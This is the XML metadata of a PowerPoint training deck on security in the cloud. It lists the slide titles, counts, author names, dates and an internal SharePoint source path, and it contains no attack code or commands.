<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Accenture_Master_Arial_01_2017</Template>
  <TotalTime>1584</TotalTime>
  <Words>1433</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>240</Paragraphs>
  <Slides>24</Slides>
  <Notes>13</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24</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="32" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Graphik</vt:lpstr>
      <vt:lpstr>Titles</vt:lpstr>
      <vt:lpstr>Content Layouts</vt:lpstr>
      <vt:lpstr>Section Dividers</vt:lpstr>
      <vt:lpstr>Specialty Slides</vt:lpstr>
      <vt:lpstr>SECURITY AND SAFETY</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>talking about cloud safety</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>hackers</vt:lpstr>
      <vt:lpstr>The imbalance of damage </vt:lpstr>
      <vt:lpstr>hackers</vt:lpstr>
      <vt:lpstr>The imbalance of damage </vt:lpstr>
      <vt:lpstr>The imbalance of damage </vt:lpstr>
      <vt:lpstr>How to actually hack</vt:lpstr>
      <vt:lpstr>How to actually hack</vt:lpstr>
      <vt:lpstr>Obscurity is not a  form of defense</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>talking about cloud safety</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reduce the  risk  of Being  hacked</vt:lpstr>
      <vt:lpstr>Reduce the impact of being hacked</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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new template</dc:title>
  <dc:creator>Rendell, Mark</dc:creator>
  <cp:lastModifiedBy>Manlapaz, Mirasol S.</cp:lastModifiedBy>
  <cp:revision>77</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-03-24T08:24:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-02T10:28:37Z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0x0101003D18B4BFBE44CB4787AA86045C9A6063</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Order">
    <vt:r8>157300</vt:r8>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="xd_ProgID">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="_CopySource">
    <vt:lpwstr>https://ts.accenture.com/sites/pdcdevelopmentcontrolservices/DevOps/DevOps/Training and Enablement Tower/Training Materials/DTS Bootcamp - Revised/Archived(8-2-2018)/DAY 9-10/SecurityInTheCloud_101_v03.pptx</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